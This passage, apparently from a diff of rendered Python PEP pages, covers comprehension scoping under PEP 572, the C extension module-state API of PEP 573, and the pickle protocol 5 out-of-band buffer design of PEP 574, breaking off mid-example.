Let’s start with a reminder of what code is generated for a generator +expression without assignment expression.

+
    +
  • Original code (EXPR usually references VAR):
    def f():
    +    a = [EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation (let’s not worry about name conflicts):
    def f():
    +    def genexpr(iterator):
    +        for VAR in iterator:
    +            yield EXPR
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Let’s add a simple assignment expression.

+
    +
  • Original code:
    def f():
    +    a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def f():
    +    if False:
    +        TARGET = None  # Dead code to ensure TARGET is a local variable
    +    def genexpr(iterator):
    +        nonlocal TARGET
    +        for VAR in iterator:
    +            TARGET = EXPR
    +            yield TARGET
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Let’s add a global TARGET declaration in f().

+
    +
  • Original code:
    def f():
    +    global TARGET
    +    a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def f():
    +    global TARGET
    +    def genexpr(iterator):
    +        global TARGET
    +        for VAR in iterator:
    +            TARGET = EXPR
    +            yield TARGET
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Or instead let’s add a nonlocal TARGET declaration in f().

+
    +
  • Original code:
    def g():
    +    TARGET = ...
    +    def f():
    +        nonlocal TARGET
    +        a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def g():
    +    TARGET = ...
    +    def f():
    +        nonlocal TARGET
    +        def genexpr(iterator):
    +            nonlocal TARGET
    +            for VAR in iterator:
    +                TARGET = EXPR
    +                yield TARGET
    +        a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Finally, let’s nest two comprehensions.

+
    +
  • Original code:
    def f():
    +    a = [[TARGET := i for i in range(3)] for j in range(2)]
    +    # I.e., a = [[0, 1, 2], [0, 1, 2]]
    +    print(TARGET)  # prints 2
    +
    +
    +
  • +
  • Translation:
    def f():
    +    if False:
    +        TARGET = None
    +    def outer_genexpr(outer_iterator):
    +        nonlocal TARGET
    +        def inner_generator(inner_iterator):
    +            nonlocal TARGET
    +            for i in inner_iterator:
    +                TARGET = i
    +                yield i
    +        for j in outer_iterator:
    +            yield list(inner_generator(range(3)))
    +    a = list(outer_genexpr(range(2)))
    +    print(TARGET)
    +
    +
    +
  • +
+
+
+

Appendix C: No Changes to Scope Semantics

+

Because it has been a point of confusion, note that nothing about Python’s +scoping semantics is changed. Function-local scopes continue to be resolved +at compile time, and to have indefinite temporal extent at run time (“full +closures”). Example:

+
a = 42
+def f():
+    # `a` is local to `f`, but remains unbound
+    # until the caller executes this genexp:
+    yield ((a := i) for i in range(3))
+    yield lambda: a + 100
+    print("done")
+    try:
+        print(f"`a` is bound to {a}")
+        assert False
+    except UnboundLocalError:
+        print("`a` is not yet bound")
+
+
+

Then:

+
>>> results = list(f()) # [genexp, lambda]
+done
+`a` is not yet bound
+# The execution frame for f no longer exists in CPython,
+# but f's locals live so long as they can still be referenced.
+>>> list(map(type, results))
+[<class 'generator'>, <class 'function'>]
+>>> list(results[0])
+[0, 1, 2]
+>>> results[1]()
+102
+>>> a
+42
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0572.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0573/index.html new file mode 100644 index 00000000000..1d5c2825e82 --- /dev/null +++ b/pep-0573/index.html @@ -0,0 +1,588 @@ + PEP 573 – Module State Access from C Extension Methods | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 573 – Module State Access from C Extension Methods

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>, +Alyssa Coghlan <ncoghlan at gmail.com>, +Eric Snow <ericsnowcurrently at gmail.com>, +Marcel Plch <gmarcel.plch at gmail.com>
+
BDFL-Delegate:
+
Stefan Behnel
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Jun-2016
+
Python-Version:
+
3.9
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a way for CPython extension methods to access context, +such as the state of the modules they are defined in.

+

This will allow extension methods to use direct pointer dereferences +rather than PyState_FindModule for looking up module state, reducing or +eliminating the performance cost of using module-scoped state over process +global state.

+

This fixes one of the remaining roadblocks for adoption of PEP 3121 (Extension +module initialization and finalization) and PEP 489 +(Multi-phase extension module initialization).

+

While this PEP takes an additional step towards fully solving the problems that +PEP 3121 and PEP 489 started tackling, it does not attempt to resolve all +remaining concerns. In particular, access to the module state +from slot methods (nb_add, etc) is not solved.

+
+
+

Terminology

+
+

Process-Global State

+

C-level static variables. Since this is very low-level +memory storage, it must be managed carefully.

+
+
+

Per-module State

+

State local to a module object, allocated dynamically as part of a +module object’s initialization. This isolates the state from other +instances of the module (including those in other subinterpreters).

+

Accessed by PyModule_GetState().

+
+
+

Static Type

+

A type object defined as a C-level static variable, i.e. a compiled-in type +object.

+

A static type needs to be shared between module instances and has no +information of what module it belongs to. +Static types do not have __dict__ (although their instances might).

+
+
+

Heap Type

+

A type object created at run time.

+
+
+

Defining Class

+

The defining class of a method (either bound or unbound) is the class on which +the method was defined. +A class that merely inherits the method from its base is not the defining class.

+

For example, int is the defining class of True.to_bytes, +True.__floor__ and int.__repr__.
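A minimal Python-level sketch of the distinction (Base and Sub are illustrative):

class Base:
    def which(self):
        return __class__  # the defining class, via the closure cell

class Sub(Base):
    pass

assert Sub().which() is Base   # defined in Base, whatever the runtime type
assert type(Sub()) is Sub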

+

In C, the defining class is the one defined with the corresponding +tp_methods or “tp slots” [1] entry. +For methods defined in Python, the defining class is saved in the +__class__ closure cell.

+
+
+

C-API

+

The “Python/C API” as described in Python documentation. +CPython implements the C-API, but other implementations exist.

+
+
+
+

Rationale

+

PEP 489 introduced a new way to initialize extension modules, which brings +several advantages to extensions that implement it:

+
    +
  • The extension modules behave more like their Python counterparts.
  • +
  • The extension modules can easily support loading into pre-existing +module objects, which paves the way for extension module support for +runpy or for systems that enable extension module reloading.
  • +
  • Loading multiple modules from the same extension is possible, which +makes it possible to test module isolation (a key feature for proper +sub-interpreter support) from a single interpreter.
  • +
+

The biggest hurdle for adoption of PEP 489 is allowing access to module state +from methods of extension types. +Currently, the way to access this state from extension methods is by looking up +the module via PyState_FindModule (in contrast to module level functions in +extension modules, which receive a module reference as an argument). +However, PyState_FindModule queries the thread-local state, making it +relatively costly compared to C level process global access and consequently +deterring module authors from using it.

+

Also, PyState_FindModule relies on the assumption that in each +subinterpreter, there is at most one module corresponding to +a given PyModuleDef. This assumption does not hold for modules that use +PEP 489’s multi-phase initialization, so PyState_FindModule is unavailable +for these modules.

+

A faster, safer way of accessing module-level state from extension methods +is needed.

+
+
+

Background

+

The implementation of a Python method may need access to one or more of +the following pieces of information:

+
    +
  • The instance it is called on (self)
  • +
  • The underlying function
  • +
  • The defining class, i.e., the class the method was defined in
  • +
  • The corresponding module
  • +
  • The module state
  • +
+

In Python code, the Python-level equivalents may be retrieved as:

+
import sys
+
+class Foo:
+    def meth(self):
+        instance = self
+        module_globals = globals()
+        module_object = sys.modules[__name__]  # (1)
+        underlying_function = Foo.meth         # (1)
+        defining_class = Foo                   # (1)
+        defining_class = __class__             # (2)
+
+
+
+

Note

+

The defining class is not type(self), since type(self) might +be a subclass of Foo.

+
+

The statements marked (1) implicitly rely on name-based lookup via the +function’s __globals__: either the Foo attribute to access the defining +class and Python function object, or __name__ to find the module object in +sys.modules.

+

In Python code, this is feasible, as __globals__ is set appropriately when +the function definition is executed, and even if the namespace has been +manipulated to return a different object, at worst an exception will be raised.

+

The __class__ closure, (2), is a safer way to get the defining class, but it +still relies on __closure__ being set appropriately.

+

By contrast, extension methods are typically implemented as normal C functions. +This means that they only have access to their arguments and C level thread-local +and process-global states. Traditionally, many extension modules have stored +their shared state in C-level process globals, causing problems when:

+
    +
  • running multiple initialize/finalize cycles in the same process
  • +
  • reloading modules (e.g. to test conditional imports)
  • +
  • loading extension modules in subinterpreters
  • +
+

PEP 3121 attempted to resolve this by offering the PyState_FindModule API, +but this still has significant problems when it comes to extension methods +(rather than module level functions):

+
    +
  • it is markedly slower than directly accessing C-level process-global state
  • +
  • there is still some inherent reliance on process global state that means it +still doesn’t reliably handle module reloading
  • +
+

It’s also the case that when looking up a C-level struct such as module state, +supplying an unexpected object layout can crash the interpreter, so it’s +significantly more important to ensure that extension methods receive the kind +of object they expect.

+
+
+

Proposal

+

Currently, a bound extension method (PyCFunction or +PyCFunctionWithKeywords) receives only self, and (if applicable) the +supplied positional and keyword arguments.

+

While module-level extension functions already receive access to the defining +module object via their self argument, methods of extension types don’t have +that luxury: they receive the bound instance via self, and hence have no +direct access to the defining class or the module level state.

+

The additional module level context described above can be made available with +two changes. +Both additions are optional; extension authors need to opt in to start +using them:

+
    +
  • Add a pointer to the module to heap type objects.
  • +
  • Pass the defining class to the underlying C function.

    In CPython, the defining class is readily available at the time the built-in +method object (PyCFunctionObject) is created, so it can be stored +in a new struct that extends PyCFunctionObject.

    +
  • +
+

The module state can then be retrieved from the module object via +PyModule_GetState.

+

Note that this proposal implies that any type whose methods need to access +per-module state must be a heap type, rather than a static type. This is +necessary to support loading multiple module objects from a single +extension: a static type, as a C-level global, has no information about +which module object it belongs to.

+
+

Slot methods

+

The above changes don’t cover slot methods, such as tp_iter or nb_add.

+

The problem with slot methods is that their C API is fixed, so we can’t +simply add a new argument to pass in the defining class. +Two possible solutions have been proposed to this problem:

+
    +
  • Look up the class by walking the MRO. +This is potentially expensive, but will be usable if performance is not +a problem (such as when raising a module-level exception).
  • +
  • Storing a pointer to the defining class of each slot in a separate table, +__typeslots__ [2]. This is technically feasible and fast, +but quite invasive.
  • +
+

Modules affected by this concern also have the option of using +thread-local state or PEP 567 context variables as a caching mechanism, or +else defining their own reload-friendly lookup caching scheme.

+

Solving the issue generally is deferred to a future PEP.

+
+
+
+

Specification

+
+

Adding module references to heap types

+

A new factory method will be added to the C-API for creating heap types:

+
PyObject* PyType_FromModuleAndSpec(PyObject *module,
+                                   PyType_Spec *spec,
+                                   PyObject *bases)
+
+
+

This acts the same as PyType_FromSpecWithBases, and additionally associates +the provided module object with the new type. (In CPython, this will set +ht_module described below.)

+

Additionally, an accessor, PyObject * PyType_GetModule(PyTypeObject *) +will be provided. +It will return the type’s associated module if one is set, +otherwise it will set TypeError and return NULL. +When given a static type, it will always set TypeError and return NULL.

+

To implement this in CPython, the PyHeapTypeObject struct will get a +new member, PyObject *ht_module, that will store a pointer to the +associated module. +It will be NULL by default and should not be modified after the type +object is created.

+

The ht_module member will not be inherited by subclasses; it needs to be +set using PyType_FromModuleAndSpec for each individual type that needs it.

+

Usually, creating a class with ht_module set will create a reference +cycle involving the class and the module. +This is not a problem, as tearing down modules is not a performance-sensitive +operation, and module-level functions typically also create reference cycles. +The existing “set all module globals to None” code that breaks function cycles +through f_globals will also break the new cycles through ht_module.

+
+
+

Passing the defining class to extension methods

+

A new signature flag, METH_METHOD, will be added for use in +PyMethodDef.ml_flags. Conceptually, it adds defining_class +to the function signature. +To make the initial implementation easier, the flag can only be used as +(METH_FASTCALL | METH_KEYWORDS | METH_METHOD). +(It can’t be used with other flags like METH_O or bare METH_FASTCALL, +though it may be combined with METH_CLASS or METH_STATIC).

+

C functions for methods defined using this flag combination will be called +using a new C signature called PyCMethod:

+
PyObject *PyCMethod(PyObject *self,
+                    PyTypeObject *defining_class,
+                    PyObject *const *args,
+                    size_t nargsf,
+                    PyObject *kwnames)
+
+
+

Additional combinations like (METH_VARARGS | METH_METHOD) may be added +in the future (or even in the initial implementation of this PEP). +However, METH_METHOD should always be an additional flag, i.e., the +defining class should only be passed in if needed.

+

In CPython, a new structure extending PyCFunctionObject will be added +to hold the extra information:

+
typedef struct {
+    PyCFunctionObject func;
+    PyTypeObject *mm_class; /* Passed as 'defining_class' arg to the C func */
+} PyCMethodObject;
+
+
+

The PyCFunction implementation will pass mm_class into a +PyCMethod C function when it finds the METH_METHOD flag being set. +A new macro PyCFunction_GET_CLASS(cls) will be added for easier access +to mm_class.

+

C methods may continue to use the other METH_* signatures if they do +not require access to their defining class/module. +If METH_METHOD is not set, casting to PyCMethodObject is invalid.

+
+
+

Argument Clinic

+

To support passing the defining class to methods using Argument Clinic, +a new converter called defining_class will be added to CPython’s Argument +Clinic tool.

+

Each method may only have one argument using this converter, and it must +appear after self, or, if self is not used, as the first argument. +The argument will be of type PyTypeObject *.

+

When used, Argument Clinic will select +METH_FASTCALL | METH_KEYWORDS | METH_METHOD as the calling convention. +The argument will not appear in __text_signature__.

+

The new converter will initially not be compatible with __init__ and +__new__ methods, which cannot use the METH_METHOD convention.

+
+
+

Helpers

+

Getting to per-module state from a heap type is a very common task. To make +this easier, a helper will be added:

+
void *PyType_GetModuleState(PyObject *type)
+
+
+

This function takes a heap type and, on success, returns a pointer to the state +of the module that the heap type belongs to.

+

On failure, two scenarios may occur. When a non-type object, or a type without a +module, is passed in, TypeError is set and NULL is returned. If the module +is found, the pointer to the state, which may be NULL, is returned without +setting any exception.

+
+
+

Modules Converted in the Initial Implementation

+

To validate the approach, the _elementtree module will be modified during +the initial implementation.

+
+
+
+

Summary of API Changes and Additions

+

The following will be added to Python C-API:

+
+
    +
  • PyType_FromModuleAndSpec function
  • +
  • PyType_GetModule function
  • +
  • PyType_GetModuleState function
  • +
  • METH_METHOD call flag
  • +
  • PyCMethod function signature
  • +
+
+

The following additions will be added as CPython implementation details, +and won’t be documented:

+
+
    +
  • PyCFunction_GET_CLASS macro
  • +
  • PyCMethodObject struct
  • +
  • ht_module member of _heaptypeobject
  • +
  • defining_class converter in Argument Clinic
  • +
+
+
+
+

Backwards Compatibility

+

One new pointer is added to all heap types. +All other changes are adding new functions and structures, +or changes to private implementation details.

+
+
+

Implementation

+

An initial implementation is available in a Github repository [3]; +a patchset is at [4].

+
+
+

Possible Future Extensions

+
+

Slot methods

+

A way of passing defining class (or module state) to slot methods may be +added in the future.

+

A previous version of this PEP proposed a helper function that would determine +a defining class by searching the MRO for a class that defines a slot to a +particular function. However, this approach would fail if a class is mutated +(which is, for heap types, possible from Python code). +Solving this problem is left to future discussions.

+
+
+

Easy creation of types with module references

+

It would be possible to add a PEP 489 execution slot type to make +creating heap types significantly easier than calling +PyType_FromModuleAndSpec. +This is left to a future PEP.

+

It may be good to add a good way to create static exception types from the +limited API. Such exception types could be shared between subinterpreters, +but instantiated without needing specific module state. +This is also left to possible future discussions.

+
+
+

Optimization

+

As proposed here, methods defined with the METH_METHOD flag only support +one specific signature.

+

If it turns out that other signatures are needed for performance reasons, +they may be added.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0573.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0574/index.html new file mode 100644 index 00000000000..b10487b53e5 --- /dev/null +++ b/pep-0574/index.html @@ -0,0 +1,696 @@ + PEP 574 – Pickle protocol 5 with out-of-band data | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 574 – Pickle protocol 5 with out-of-band data

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Mar-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Mar-2018, 30-Apr-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to standardize a new pickle protocol version, and +accompanying APIs to take full advantage of it:

+
    +
  1. A new pickle protocol version (5) to cover the extra metadata needed +for out-of-band data buffers.
  2. A new PickleBuffer type for __reduce_ex__ implementations +to return out-of-band data buffers.
  3. A new buffer_callback parameter when pickling, to handle out-of-band +data buffers.
  4. A new buffers parameter when unpickling to provide out-of-band data +buffers.
+

The PEP guarantees unchanged behaviour for anyone not using the new APIs.

+
+
+

Rationale

+

The pickle protocol was originally designed in 1995 for on-disk persistency +of arbitrary Python objects. The performance of a 1995-era storage medium +probably made it irrelevant to focus on performance metrics such as +use of RAM bandwidth when copying temporary data before writing it to disk.

+

Nowadays the pickle protocol sees a growing use in applications where most +of the data isn’t ever persisted to disk (or, when it is, it uses a portable +format instead of a Python-specific one). Instead, pickle is being used to transmit +data and commands from one process to another, either on the same machine +or on multiple machines. Those applications will sometimes deal with very +large data (such as Numpy arrays or Pandas dataframes) that need to be +transferred around. For those applications, pickle is currently +wasteful as it imposes spurious memory copies of the data being serialized.

+

As a matter of fact, the standard multiprocessing module uses pickle +for serialization, and therefore also suffers from this problem when +sending large data to another process.

+

Third-party Python libraries, such as Dask [1], PyArrow [4] +and IPyParallel [3], have started implementing alternative +serialization schemes with the explicit goal of avoiding copies on large +data. Implementing a new serialization scheme is difficult and often +leads to reduced generality (since many Python objects support pickle +but not the new serialization scheme). Falling back on pickle for +unsupported types is an option, but then you get back the spurious +memory copies you wanted to avoid in the first place. For example, +dask is able to avoid memory copies for Numpy arrays and +built-in containers thereof (such as lists or dicts containing Numpy +arrays), but if a large Numpy array is an attribute of a user-defined +object, dask will serialize the user-defined object as a pickle +stream, leading to memory copies.

+

The common theme of these third-party serialization efforts is to generate +a stream of object metadata (which contains pickle-like information about +the objects being serialized) and a separate stream of zero-copy buffer +objects for the payloads of large objects. Note that, in this scheme, +small objects such as ints, etc. can be dumped together with the metadata +stream. Refinements can include opportunistic compression of large data +depending on its type and layout, like dask does.

+

This PEP aims to make pickle usable in a way where large data is handled +as a separate stream of zero-copy buffers, letting the application handle +those buffers optimally.

+
+
+

Example

+

To keep the example simple and avoid requiring knowledge of third-party +libraries, we will focus here on a bytearray object (but the issue is +conceptually the same with more sophisticated objects such as Numpy arrays). +Like most objects, the bytearray object isn’t immediately understood by +the pickle module and must therefore specify its decomposition scheme.

+

Here is how a bytearray object currently decomposes for pickling:

+
>>> b.__reduce_ex__(4)
+(<class 'bytearray'>, (b'abc',), None)
+
+
+

This is because the bytearray.__reduce_ex__ implementation reads +morally as follows:

+
class bytearray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol == 4:
+         return type(self), bytes(self), None
+      # Legacy code for earlier protocols omitted
+
+
+

In turn it produces the following pickle code:

+
>>> pickletools.dis(pickletools.optimize(pickle.dumps(b, protocol=4)))
+    0: \x80 PROTO      4
+    2: \x95 FRAME      30
+   11: \x8c SHORT_BINUNICODE 'builtins'
+   21: \x8c SHORT_BINUNICODE 'bytearray'
+   32: \x93 STACK_GLOBAL
+   33: C    SHORT_BINBYTES b'abc'
+   38: \x85 TUPLE1
+   39: R    REDUCE
+   40: .    STOP
+
+
+

(the call to pickletools.optimize above is only meant to make the +pickle stream more readable by removing the MEMOIZE opcodes)

+

We can notice several things about the bytearray’s payload (the sequence +of bytes b'abc'):

+
    +
  • bytearray.__reduce_ex__ produces a first copy by instantiating a +new bytes object from the bytearray’s data.
  • +
  • pickle.dumps produces a second copy when inserting the contents of +that bytes object into the pickle stream, after the SHORT_BINBYTES opcode.
  • +
  • Furthermore, when deserializing the pickle stream, a temporary bytes +object is created when the SHORT_BINBYTES opcode is encountered (inducing +a data copy).
  • +
+

What we really want is something like the following:

+
    +
  • bytearray.__reduce_ex__ produces a view of the bytearray’s data.
  • +
  • pickle.dumps doesn’t try to copy that data into the pickle stream +but instead passes the buffer view to its caller (which can decide on the +most efficient handling of that buffer).
  • +
  • When deserializing, pickle.loads takes the pickle stream and the +buffer view separately, and passes the buffer view directly to the +bytearray constructor.
  • +
+

We see that several conditions are required for the above to work:

+
    +
  • __reduce__ or __reduce_ex__ must be able to return something +that indicates a serializable no-copy buffer view.
  • +
  • The pickle protocol must be able to represent references to such buffer +views, instructing the unpickler that it may have to get the actual buffer +out of band.
  • +
  • The pickle.Pickler API must provide its caller with a way +to receive such buffer views while serializing.
  • +
  • The pickle.Unpickler API must similarly allow its caller to provide +the buffer views required for deserialization.
  • +
  • For compatibility, the pickle protocol must also be able to contain direct +serializations of such buffer views, such that current uses of the pickle +API don’t have to be modified if they are not concerned with memory copies.
  • +
+
+
+

Producer API

+

We are introducing a new type pickle.PickleBuffer which can be +instantiated from any buffer-supporting object, and is specifically meant +to be returned from __reduce__ implementations:

+
class bytearray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol >= 5:
+         return type(self), (PickleBuffer(self),), None
+      # Legacy code for earlier protocols omitted
+
+
+

PickleBuffer is a simple wrapper that doesn’t have all the memoryview +semantics and functionality, but is specifically recognized by the pickle +module if protocol 5 or higher is enabled. It is an error to try to +serialize a PickleBuffer with pickle protocol version 4 or earlier.

+

Only the raw data of the PickleBuffer will be considered by the +pickle module. Any type-specific metadata (such as shapes or +datatype) must be returned separately by the type’s __reduce__ +implementation, as is already the case.

+
+

PickleBuffer objects

+

The PickleBuffer class supports a very simple Python API. Its constructor +takes a single PEP 3118-compatible object. PickleBuffer +objects themselves support the buffer protocol, so consumers can +call memoryview(...) on them to get additional information +about the underlying buffer (such as the original type, shape, etc.). +In addition, PickleBuffer objects have the following methods:

+

raw()

+
+
Return a memoryview of the raw memory bytes underlying the PickleBuffer, +erasing any shape, strides and format information. This is required to +handle Fortran-contiguous buffers correctly in the pure Python pickle +implementation.
+

release()

+
+
Release the PickleBuffer’s underlying buffer, making it unusable.
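A minimal sketch of this Python-level API, using the pickle.PickleBuffer name introduced above (runnable on Python 3.8 and later, where the class shipped):

import pickle

data = bytearray(b'abcdef')
pb = pickle.PickleBuffer(data)

with memoryview(pb) as view:      # PickleBuffer supports the buffer protocol
    assert view.tobytes() == b'abcdef'
with pb.raw() as raw:             # flat, format-erased view of the same bytes
    assert raw.nbytes == 6 and raw.format == 'B'

pb.release()                      # the wrapped buffer is now unusable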
+

On the C side, a simple API will be provided to create and inspect +PickleBuffer objects:

+

PyObject *PyPickleBuffer_FromObject(PyObject *obj)

+
+
Create a PickleBuffer object holding a view over the PEP 3118-compatible +obj.
+

PyPickleBuffer_Check(PyObject *obj)

+
+
Return whether obj is a PickleBuffer instance.
+

const Py_buffer *PyPickleBuffer_GetBuffer(PyObject *picklebuf)

+
+
Return a pointer to the internal Py_buffer owned by the PickleBuffer +instance. An exception is raised if the buffer is released.
+

int PyPickleBuffer_Release(PyObject *picklebuf)

+
+
Release the PickleBuffer instance’s underlying buffer.
+
+
+

Buffer requirements

+

PickleBuffer can wrap any kind of buffer, including non-contiguous +buffers. However, it is required that __reduce__ only returns a +contiguous PickleBuffer (contiguity here is meant in the PEP 3118 +sense: either C-ordered or Fortran-ordered). Non-contiguous buffers +will raise an error when pickled.

+

This restriction is primarily an ease-of-implementation issue for the +pickle module, but it also helps other consumers of out-of-band buffers. +The simplest solution on the provider side is to return a contiguous +copy of a non-contiguous buffer; a sophisticated provider, though, may +decide instead to return a sequence of contiguous sub-buffers.
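As a sketch of the restriction (again assuming the pickle.PickleBuffer name), wrapping a non-contiguous buffer succeeds, but pickling it does not:

import pickle

m = memoryview(bytes(range(16)))[::2]   # strided, non-contiguous view
pb = pickle.PickleBuffer(m)             # wrapping is allowed...
try:
    pickle.dumps(pb, protocol=5)        # ...but pickling raises
except pickle.PicklingError as exc:
    print(exc)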

+
+
+
+

Consumer API

+

pickle.Pickler.__init__ and pickle.dumps are augmented with an additional +buffer_callback parameter:

+
class Pickler:
+   def __init__(self, file, protocol=None, ..., buffer_callback=None):
+      """
+      If *buffer_callback* is None (the default), buffer views are
+      serialized into *file* as part of the pickle stream.
+
+      If *buffer_callback* is not None, then it can be called any number
+      of times with a buffer view.  If the callback returns a false value
+      (such as None), the given buffer is out-of-band; otherwise the
+      buffer is serialized in-band, i.e. inside the pickle stream.
+
+      The callback should arrange to store or transmit out-of-band buffers
+      without changing their order.
+
+      It is an error if *buffer_callback* is not None and *protocol* is
+      None or smaller than 5.
+      """
+
+def pickle.dumps(obj, protocol=None, *, ..., buffer_callback=None):
+   """
+   See above for *buffer_callback*.
+   """
+
+
+

pickle.Unpickler.__init__ and pickle.loads are augmented with an +additional buffers parameter:

+
class Unpickler:
+   def __init__(file, *, ..., buffers=None):
+      """
+      If *buffers* is not None, it should be an iterable of buffer-enabled
+      objects that is consumed each time the pickle stream references
+      an out-of-band buffer view.  Such buffers have been given in order
+      to the *buffer_callback* of a Pickler object.
+
+      If *buffers* is None (the default), then the buffers are taken
+      from the pickle stream, assuming they are serialized there.
+      It is an error for *buffers* to be None if the pickle stream
+      was produced with a non-None *buffer_callback*.
+      """
+
+def pickle.loads(data, *, ..., buffers=None):
+   """
+   See above for *buffers*.
+   """
+
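Putting the producer and consumer APIs together, here is a hedged round-trip sketch; ZeroCopyArray is a hypothetical example class, not part of this proposal:

import pickle

class ZeroCopyArray:
    """Hypothetical type whose payload can travel out-of-band."""

    def __init__(self, data):
        self.data = bytearray(data)

    def __reduce_ex__(self, protocol):
        if protocol >= 5:
            return type(self), (pickle.PickleBuffer(self.data),)
        return type(self), (bytes(self.data),)

obj = ZeroCopyArray(b'x' * 1_000_000)
buffers = []
data = pickle.dumps(obj, protocol=5, buffer_callback=buffers.append)
# `data` holds only the small metadata stream; the large payload stays
# in `buffers` and is never copied into the pickle stream.
restored = pickle.loads(data, buffers=buffers)
assert restored.data == obj.data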
+
+
+
+

Protocol changes

+

Three new opcodes are introduced:

+
    +
  • BYTEARRAY8 creates a bytearray from the data following it in the pickle +stream and pushes it on the stack (just like BINBYTES8 does for bytes +objects);
  • +
  • NEXT_BUFFER fetches a buffer from the buffers iterable and pushes +it on the stack.
  • +
  • READONLY_BUFFER makes a readonly view of the top of the stack.
  • +
+

When pickling encounters a PickleBuffer, that buffer can be considered +in-band or out-of-band depending on the following conditions:

+
    +
  • if no buffer_callback is given, the buffer is in-band;
  • +
  • if a buffer_callback is given, it is called with the buffer. If the +callback returns a true value, the buffer is in-band; if the callback +returns a false value, the buffer is out-of-band.
  • +
+
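For example, a buffer_callback can keep only large payloads out-of-band; this is a sketch, and the 64 KiB threshold is an arbitrary assumption:

import pickle

buffers = []

def buffer_callback(pb):
    if pb.raw().nbytes >= 65536:
        buffers.append(pb)   # the caller transmits these separately
        return False         # false value: out-of-band
    return True              # true value: in-band, inside the stream

payload = [pickle.PickleBuffer(b'tiny'), pickle.PickleBuffer(b'x' * 100_000)]
data = pickle.dumps(payload, protocol=5, buffer_callback=buffer_callback)
assert len(buffers) == 1     # only the large buffer went out-of-band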

An in-band buffer is serialized as follows:

+
    +
  • If the buffer is writable, it is serialized into the pickle stream as if +it were a bytearray object.
  • +
  • If the buffer is readonly, it is serialized into the pickle stream as if +it were a bytes object.
  • +
+

An out-of-band buffer is serialized as follows:

+
    +
  • If the buffer is writable, a NEXT_BUFFER opcode is appended to the +pickle stream.
  • +
  • If the buffer is readonly, a NEXT_BUFFER opcode is appended to the +pickle stream, followed by a READONLY_BUFFER opcode.
  • +
+

The distinction between readonly and writable buffers is motivated below +(see “Mutability”).

+
+
+

Side effects

+
+

Improved in-band performance

+

Even in-band pickling can be improved by returning a PickleBuffer +instance from __reduce_ex__, as one copy is avoided on the serialization +path [10] [12].
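A minimal sketch of that in-band path (no buffer_callback given):

import pickle

pb = pickle.PickleBuffer(bytearray(b'abc'))
data = pickle.dumps(pb, protocol=5)   # buffer serialized inside the stream
assert pickle.loads(data) == bytearray(b'abc')   # writable, so a bytearray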

+
+
+
+

Caveats

+
+

Mutability

+

PEP 3118 buffers can be readonly or writable. Some objects, +such as Numpy arrays, need to be backed by a mutable buffer for full +operation. Pickle consumers that use the buffer_callback and buffers +arguments will have to be careful to recreate mutable buffers. When doing +I/O, this implies using buffer-passing API variants such as readinto +(which are also often preferable for performance).
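A sketch of such a receive path; the framing (payload sizes sent ahead of the data) is a hypothetical application-level choice:

def read_buffers(stream, sizes):
    # Fill preallocated, mutable bytearrays in place with readinto(),
    # so unpickled objects end up backed by writable memory.
    buffers = []
    for size in sizes:
        buf = bytearray(size)
        n = stream.readinto(buf)   # assumes the stream delivers size bytes
        assert n == size
        buffers.append(buf)
    return buffers

# restored = pickle.loads(metadata, buffers=read_buffers(stream, sizes))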

+
+
+

Data sharing

+

If you pickle and then unpickle an object in the same process, passing +out-of-band buffer views, then the unpickled object may be backed by the +same buffer as the original pickled object.

+

For example, it might be reasonable to implement reduction of a Numpy array +as follows (crucial metadata such as shapes is omitted for simplicity):

+
class ndarray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol == 5:
+         return numpy.frombuffer, (PickleBuffer(self), self.dtype)
+      # Legacy code for earlier protocols omitted
+
+
+

Then simply passing the PickleBuffer around from dumps to loads +will produce a new Numpy array sharing the same underlying memory as the +original Numpy object (and, incidentally, keeping it alive):

+
>>> import numpy as np
+>>> a = np.zeros(10)
+>>> a[0]
+0.0
+>>> buffers = []
+>>> data = pickle.dumps(a, protocol=5, buffer_callback=buffers.append)
+>>> b = pickle.loads(data, buffers=buffers)
+>>> b[0] = 42
+>>> a[0]
+42.0
+
+
+

This won’t happen with the traditional pickle API (i.e. without passing +buffers and buffer_callback parameters), because then the buffer view +is serialized inside the pickle stream with a copy.

+
+
+
+

Rejected alternatives

+
+

Using the existing persistent load interface

+

The pickle persistence interface is a way of storing references to +designated objects in the pickle stream while handling their actual +serialization out of band. For example, one might consider the following +for zero-copy serialization of bytearrays:

+
class MyPickle(pickle.Pickler):
+
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.buffers = []
+
+    def persistent_id(self, obj):
+        if type(obj) is not bytearray:
+            return None
+        else:
+            index = len(self.buffers)
+            self.buffers.append(obj)
+            return ('bytearray', index)
+
+
+class MyUnpickle(pickle.Unpickler):
+
